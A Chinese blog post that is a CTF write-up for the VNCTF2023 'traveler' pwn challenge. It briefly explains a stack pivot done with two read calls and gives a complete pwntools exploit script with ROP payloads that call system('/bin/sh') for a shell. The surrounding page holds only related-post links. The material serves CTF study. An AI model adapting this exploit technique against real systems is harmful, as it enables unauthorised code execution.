vnctf2023 traveler

原创 已于 2023-02-23 14:04:14 修改 · 546 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #python #安全

于 2023-02-22 23:33:55 首次发布
该文章描述了一个利用两次read调用来进行栈迁移并引发栈溢出的安全漏洞利用过程。在AMD64架构的Linux系统中,通过精心构造payload,文章作者旨在操控程序执行流,覆盖栈上的指针,最终达到执行自定义代码(如system函数调用/bin/sh)的目的。在调试过程中,注意到leave指令后rsp寄存器的改变,这是关键的栈操作。

利用两次read,达成栈迁移,注意要迁移到更高的栈,并且利用read写更高的栈,完成栈溢出。注意调试,leave后rsp会+8。

from pwn import *

p = process('./traveler')
#p = remote('node4.buuoj.cn',29186)
elf = ELF('./traveler')
context(arch="amd64",os="linux", log_level="debug")

lv = 0x0000000000401253
msg = 0x4040A0
bss = 0x404d00
rdi = p64(0x00000000004012c3)
ret = p64(0x000000000040101a)
main = elf.sym['main']
sys = elf.plt['system']
read = elf.plt['read']
newread = 0x401216

#gdb.attach(p)

payload = b'a'*31 + b'p' + p64(bss+0x20) + p64(newread)
payload2 = p64(0)*5
p.recvuntil("u?\n")
p.send(payload)
p.recvuntil("life?\n")
p.send(payload2)
p3 = rdi + p64(msg) + p64(sys) + p64(0) + p64(bss-0x08) + p64(lv)
p.send(p3)
p.recvuntil("life?\n")
p.send(b'/bin/sh\x00')
p.interactive()
N1nEmAn
关注
VNCTF2023-misc方向wp
toto的博客
02-19 2176
VNCTF2023wp
算法作业Traveler.rar_traveler_traveler problem
09-24
文件"www.pudn.com.txt"可能包含了更多关于旅行者问题的背景信息或参考资料,而"Traveler"可能是实际的程序代码或者实验数据。在实际解题过程中,学生需要根据给定的数据结构,如城市坐标、城市间的距离矩阵等,编写...
VNCTF2023 PWN (traveler & tongxunlu)
maple105890的博客
02-19 1069
坐牢的一天呢
VNCTF2023 WP
qq_74710163的博客
02-25 763
其功能主要是为命令行程序(cmd.exe)提供类似于Csrss.exe进程的图形子系统等功能支持,而之前在Windows XP系统中Conhost.exe的这一功能是由Csrss.exe进程“兼职”提供的,但这被认为存在不安全因素,于是微软为了提高系统安全性在06年之后发布的Vista和Win7系统中新加入Conhost.exe进程。svchost.exe是微软Windows操作系统中的系统文件,微软官方对它的解释是:svchost.exe 是从动态链接库 (DLL) 中运行的服务的通用主机进程名称。
vnctf2022 travel-dfs递归爆破
qq_54929422的博客
01-24 311
因为字符一环套一环,前一个数依靠后一个数,已知v4[23],可以用dfs(递归)的方法。第45-46行的异或有点难搞,因为模的话有很多取值,所以采取爆破的方法。看上去很复杂,实际上不难理解,有点像简易版的aes。动调把dword_404040数组dump下来。而且面对复杂的代码要慢慢看,逻辑可能是清晰的。垃圾代码很少,有可读性,有两次字符串输入。很容易异或,所以不要被复杂的代码吓到。然后是关键函数sub_402058。脚本先dfs爆破,得到的值进行逆。关键函数sub_401A6C。脚本得20211205。
NewStarCTF 2023 [WEEK 3] PWN
Xzzzz911的博客
10-28 1307
这次题目确实上了一个档次,有些东西确实也不怎么好理解,慢慢来,积少成多,相同题型放一起总结,总会得出好的结论,就一句话:多做多总结,冲冲冲!!!
traveler
10-24
标题“traveler”和描述“traveler”都比较简单,没有明确指出具体的知识点。但从标签“字体”我们可以推测,这可能与设计、排版或计算机图形学中的字体资源相关。通常,一个名为“1959”的压缩包文件可能是包含某种...
Traveler-开源
05-15
Traveler中,Apache可能预配置了常用的模块,如mod_rewrite,用于URL重写,以实现更友好的SEO优化URL。 MySQL是世界上最流行的关系型数据库管理系统之一,用于存储和检索网站的数据。它的特点是速度快、可靠且...
traveler-problem.rar_traveler_覆盖问题
09-22
《旅行者问题与覆盖问题详解》 旅行者问题(Traveling Salesman Problem,TSP)是图论中的一个经典问题,也是运筹学领域的重要研究对象。这个问题源于一个假设的情境:一个旅行者需要访问图中所有城市一次,并返回...
[irisctf 2023] pwn部分
weixin_52640415的博客
01-09 911
irisctf 2023 pwn 两题
VNCTF 2023 部分wp
sln_1550的博客
02-20 2708
今年逆向题目比较多,还挺顺手的,其他题目还算不难,除了babyAnti这题就AK逆向了。这题用的flutter库,研究了好久也完全找不到思路,只好放弃。后来才知道根据题目的名字,预期解就是去掉反作弊的检查,用作弊方法完成的。
VNCTF2023 babygo backdoor部分payload详解
m0_73606240的博客
02-26 587
看了几个人的vnctf2023的web复现,我觉得部分人可能会觉得backdoor部分的payload有点难理解,这里帮他们补充一下,先上源码
2023VNCTF-re-PZGalaxy
qq_54894802的博客
02-26 376
这里分析一下我们就可以知道,data和enc都传入了Leaf中进行加密,我们就可以推测出data,就是进行加密的密钥。后面的一行代码,分别是判断flag前面四个字符,和data前面的四个字符,并且我们可以知道,data的长度为8.解出flag:flag{HitYourSoulAndSeeYouInTheGalaxy}知道key的前四个字符,也知道key的前四个字符,自然想到对key进行爆破。源码很有特点,就是进行rc4加密。用浏览器打开 开发者工具查看源码。这道题是用js写的代码。
VNCTF2023复现
qq_74655174的博客
02-23 1010
VNCTF2023复现
VNCTF2023部分wp
weixin_52118017的博客
02-19 903
vnctf2023部分wp
PWN练习---Stack_2
qq_74259765的博客
08-19 1261
BUUCTF靶场——srop,putsorsys,re2tcsu_1,traveler
CTF-PWN-栈溢出-中级ROP-【栈迁移】
llovewuzhengzi的博客
01-09 1781
所以此时的gadget应该是能够进行栈迁移的,即为待会要改到的rsp值+修改参数的gadget+read函数+leave_ret,此时由于想直接用程序内的gadget来构造参数,此时可以以原函数开始准备read函数调用的地址作为调用read函数地址,此时可以参数构造就不要担心需要找gadget或者直接利用read函数后rdi rsi rdx没有被修改的特点从而只修改rsi即可,正好存在这样的gadget(main函数ret结束前调用的最后一个函数是向bss段输入数据)。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8839
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
50、【Ubuntu】【Gitlab】拉出内网 Web 服务:http.server 单/多线程分析(二)
最新发布
HIT_Weston的博客
12-04 1428
本文分析了Python的http.server模块在单线程和多线程模式下的性能表现。通过测试发现,单线程模式下(Python<3.7)并发请求会被阻塞,后发请求需要等待前一个请求完成;而多线程模式下(Python≥3.7)可以同时处理多个请求。作者通过slow_server.py脚本模拟耗时操作,使用time curl命令测试响应时间,验证了线程模型的差异。文章还指出Python 3.7是一个重要分水岭,官方将默认命令行服务器升级为多线程以提升用户体验。技术细节参考了CPython源码,并提供了Git
解决datatraveler 2.0驱动安装问题的万能U盘驱动
标题和描述中提到的“万能U盘驱动”、“datatraveler 2.0的驱动”和“USB接口是1.1,而你的USB是2.0”涉及的知识点主要集中在USB接口的版本差异、驱动安装和兼容性问题上。下面我将对这些知识点进行详细说明。 ### ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值